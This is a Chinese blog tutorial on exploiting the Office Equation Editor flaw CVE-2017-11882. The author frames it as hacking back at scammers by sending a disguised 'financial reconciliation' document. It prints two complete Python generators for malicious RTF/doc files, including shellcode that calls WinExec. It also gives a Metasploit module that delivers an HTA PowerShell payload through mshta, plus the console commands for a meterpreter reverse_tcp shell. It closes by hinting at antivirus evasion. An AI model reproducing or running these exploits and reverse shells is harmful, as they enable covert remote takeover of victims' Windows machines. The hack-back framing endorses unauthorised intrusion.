昨天朋友问到我,有搞诈骗的加他 QQ 冒充财务要求转账,该怎么治,我说很简单,绑远控就行了。
于是针对该怎么治诈骗,让文件看起来安全又无害。EXE 可能不会上当,那么 Doc 呢?一份财务对账表?我们深入交流了一下,用了最近不久的 Office 远程代码漏洞,也称 Office 内存破坏漏洞,编号为「CVE--11882」,并且已经成功拿到物理机的 Shell。
于是就有了这篇文章,这篇文章我会在本地进行漏洞复现测试,结合 Metasploit 建立 TCP 反向链接进行提权。
PS:Office就是微软那一套办公软件,包含Word,Excel那套软件。
直接贴本地复现过程,至于怎么利用还请自己思考。
11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏之久的 Office 远程代码执行漏洞(CVE--11882)。该漏洞为 Office 内存破坏漏洞,影响目前流行的所有 Office 版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞 POC 在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。
漏洞影响到的版本有:
Office 365Microsoft Office 2000Microsoft Office Microsoft Office Service Pack 3Microsoft Office Service Pack 2Microsoft Office Service Pack 1Microsoft Office
等于说,影响现在主流的 Office 版本,基本可以做到通杀。
这里我给出两个 POC。
/embedi/CVE--11882,国外黑客所写
/Ridter/CVE--11882,国内黑客所写
两个 POC 的代码我也贴在下面。
Command43b_CVE--11882.py 的代码如下:
import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} {\*\generator Riched20 6.3.9600}\viewkind4\uc1 \pard\sa200\sl276\slmult1\f0\fs22\lang9"""RTF_TRAILER = R"""\par} """OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """OBJECT_TRAILER = R""" }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}} {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}} {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}} {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0 \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}010009000003510000000000120000000000050000000902000000000500000001000000050000000102ffffff00050000002e0118000000050000000b02 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}} """OBJDATA_TEMPLATE = R""" 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffff5f006f007400200045006e007400790000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000 0000000000000000000000000000000000000000000000000000001400000000000000010043006f 006d0070004f006a000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000012000100000003000000ffffffff0000000000 00000000000000000000000000000000000000000000000000000000000000010000006600000000 00000003004f006a0049006e0066006f00000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff ffffff00000000000000000000000000000000000000000000000000000000000000000000000003 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffff01000002080000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000 00000000000000000000000000000000000000000000000000000000000000000000000000030004 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000001c0000000ec4a900000000000000c8a75c00c4 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141120c4300000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000004500710075 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000 0000000000000000000000000000000000000000000000000000000000000004000000c500000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff ffffff00000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000ff ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d 45544146494c4550494354003421000035feffff900008003421cb010000010009000003c500 000002001c0000000000050000000902000000000500000001000000050000000102ffffff00 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000 0000bc0200000000010253797374656d000048008a0100000a000600000048008a01ffffffff 7cef1800040000002d01010004000000f0010000030000000000 """COMMAND_OFFSET = 0x949*2def create_ole_exec_primitive(command): if len(command) > 43: print "[!] Primitive command must be shorter than 43 bytes" sys.exit(0) hex_command = command.encode("hex") objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n") ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):] return OBJECT_HEADER + ole_data + OBJECT_TRAILERdef create_rtf(header,command,trailer): ole1 = create_ole_exec_primitive(command + " &") # We need 2 or more commands for executing remote file from WebDAV # because WebClient service start may take some time return header + ole1 + trailerdef getrheader(file): input_file = open(file,"r").read() r_header = input_file.split("{\*\datastore")[0] return r_headerif __name__ == '__main__': parser = argparse.ArgumentParser(description="PoC for CVE--11882") parser.add_argument("-c", "--command", help="Command to execute.", required=True) parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) parser.add_argument("-i", "--input", help="Input normal rtf.", required=False) args = parser.parse_args() if args.input != None: r_header = getrheader(args.input) else: r_header = RTF_HEADER rtf_content = create_rtf(r_header, mand ,RTF_TRAILER) output_file = open(args.output, "w") output_file.write(rtf_content) print "[*] Done ! output file --> " + args.output
Command109b_CVE--11882.py 的代码如下:
# Original poc :/embedi/CVE--11882# This version accepts a command with 109 bytes long in maximum.# Sorry I don't know how to read the struct in objdata, hence I cannot modify the length parameter to aquire a arbitrary length code execution.# But that's enough in exploitation. We can use regsvr32 to load sct file remotely.:)import argparseimport sysfrom struct import packhead=r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}} {\*\generator Riched20 6.3.9600}\viewkind4\uc1\pard\sa200\sl276\slmult1\f0\fs22\lang9'''objclass=r'''{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5f006f007400200045006e0074007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f006a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'''tail=r''' 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF900008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000001000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC0200000000010253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000 }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}} {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}} {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}} {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0 \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}010009000003510000000000120000000000050000000902000000000500000001000000050000000102ffffff00050000002e0118000000050000000b02 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}\par} ''' #0: b8 44 eb 71 12mov eax,0x1271eb44 #5: ba 78 56 34 12mov edx,0x12345678 #a: 31 d0 xor eax,edx #c: 8b 08 mov ecx,DWORD PTR [eax] #e: 8b 09 mov ecx,DWORD PTR [ecx] #10: 8b 09 mov ecx,DWORD PTR [ecx] #12: 66 83 c1 3c add cx,0x3c #16: 31 db xor ebx,ebx #18: 53 push ebx #19: 51 push ecx #1a: be 64 3e 72 12mov esi,0x12723e64 #1f: 31 d6 xor esi,edx #21: ff 16 call DWORD PTR [esi] // call WinExec #23: 53 push ebx #24: 66 83 ee 4c sub si,0x4c #28: ff 10 call DWORD PTR [eax] // call ExitProcessstage1="\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"# pads with nopstage1=stage1.ljust(44,'\x90')def genrtf(cmd,r_head): if len(cmd) > 109: print "[!] Primitive command must be shorter than 109 bytes" sys.exit(0) payload='\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ' payload+=stage1 payload+=pack('<I',0x00402114) # ret payload+='\x00'*2 payload+=cmd payload=payload.ljust(197,'\x00') return r_head+objclass+payload.encode('hex')+taildef getrheader(file): input_file = open(file,"r").read() r_header = input_file.split("{\*\datastore")[0] return r_header if __name__ == '__main__': parser = argparse.ArgumentParser(description="PoC for CVE--11882") parser.add_argument("-c", "--cmd", help="Command run in target system", required=True) parser.add_argument('-o', "--output", help="Output exploit rtf", required=True) parser.add_argument("-i", "--input", help="Input normal rtf.", required=False) args = parser.parse_args() if args.input != None: r_header = getrheader(args.input) else: r_header = head with open(args.output,'wb') as f: f.write(genrtf(args.cmd,r_header)) f.close() print "[*] Done ! output file --> " + args.output
利用到的工具如下:
Windows7OfficeMetasploit
利用的过程如下:
打开上面的 Command43b_CVE--11882.py 的脚本,测试一下 DOC 文件。
使用命令如下:
python Command43b_CVE--11882.py -c "cmd.exe /c calc.exe" -o cve.doc
使用这条命令后会在目录里生成一个名为 cve.doc 的 doc 文件,拿到 Windows7 靶机去打开看看效果。如下图所示。
Windows7 打开恶意 doc 文件后,系统调用的计算器已经弹出,证明该 POC 是可行的(为什么要弹计算器……这个梗已经被众多黑客玩烂了……)。
MSF 进行漏洞利用
现在就需要一个 rb 脚本来和 MSF 进行交互,具体操作如下。
首先需要在 MSF 里添加这个脚本,如果 MSF 没有作改动,路径应该是 /usr/share/metasploit-framework/modules/exploits/windows,可以在这目录下新建一个文件夹。
将下面的脚本写入到 PS_shell.rb。
## # This module requires Metasploit: /download # Current source: /rapid7/metasploit-framework## class MetasploitModule < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Office Payload Delivery', 'Description' => %q{ This module generates an command to place within a word document, that when executed, will retrieve a HTA payload via HTTP from an web server. Currently have not figured out how to generate a doc. }, 'License' => MSF_LICENSE, 'Arch' => ARCH_X86, 'Platform' => 'win', 'Targets' => [ ['Automatic', {} ], ], 'DefaultTarget' => 0, ))enddef on_request_uri(cli, _request) print_status("Delivering payload") p = regenerate_payload(cli) data = Msf::Util::EXE.to_executable_fmt( framework, ARCH_X86, 'win', p.encoded, 'hta-psh', { :arch => ARCH_X86, :platform => 'win '} ) send_response(cli, data, 'Content-Type' => 'application/hta')enddef primer url = get_uri print_status("Place the following DDE in an MS document:") print_line("mshta.exe \"#{url}\"")end end
打开 MSF 后,搜搜漏洞利用模块。
msf > PS_shell
如下图所示。
使用该模块
msf > use exploit/windows/CVE--11882/PS_shell
如下图所示。
上图的操作过程如下:
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp //设置payload为反弹TCP连接 payload => windows/meterpreter/reverse_tcp msf exploit(PS_shell) > set lhost 192.168.30.128 //设置本机IP lhost => 172.16.253.76 msf exploit(PS_shell) > set URIPATH test //设置URI地址 URIPATH => abc msf exploit(PS_shell) > show options //检查配置 Module options (exploit/windows/CVE--11882/PS_shell): NameCurrent Setting Required Description ------------------- -------- ----------- SRVHOST 0.0.0.0yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSLfalse no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH test no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): NameCurrent Setting Required Description ------------------- -------- ----------- EXITFUNC processyes Exit technique (Accepted: '', seh, thread, process, none) LHOST192.168.30.128 yes The listen address LPORT4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
配置无误后即可执行,执行后 MSF 会监听本地8080端口,如果机器打开 doc 就会触发,反弹 shell 建立会话。
msf exploit(PS_shell) > exploit -j [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.30.128:4444msf exploit(PS_shell) > [*] Using URL: http://0.0.0.0:8080/test [*] Local IP: http://192.168.30.128:8080/test [*] Server started. [*] Place the following DDE in an MS document: mshta.exe "http://192.168.30.128:8080/test"
此时这个 test 显然不是一份 doc 格式的文件,我们需要用到刚刚用的 py 脚本文件,生成一份恶意的 doc 文件。
生成恶意 doc 文件
如下图所示。
这个时候,拿 test1.doc 文件到 Windows7 去打开试试,如下图所示。
Windows7 打开效果
如下图所示。
MSF 监听效果
如下图所示。
可以看到 MSF 已经和 Windows7 建立起了连接,此种攻击方式利用的是 powershell 反弹,打开恶意 doc 文档的时候会一闪而逝的“Poweshell”窗口。
net user
如下图所示。
到此漏洞复现完成。说点其他的,现在的攻击方式可不止 EXE 文件这种方式。
样本文件360会扫描识别到并且拦截,因为调用了 powershell,类似于恶意动作,360会报警。
但是可以用免杀处理一下,至于怎么处理,就看各位的功夫了。
一般人不会想到恶意 doc 文档攻击,尽量小心陌生人发来的东西,可能不止是 EXE 文件,doc 也可能会充满恶意。
本文首发于GitChat,未经授权,转载需与GitChat联系。
阅读全文: /gitchat/activity/5a77d78f7648740c4c24c52b
您还可以下载 CSDN 旗下精品原创内容社区 GitChat App , GitChat 专享技术内容哦。
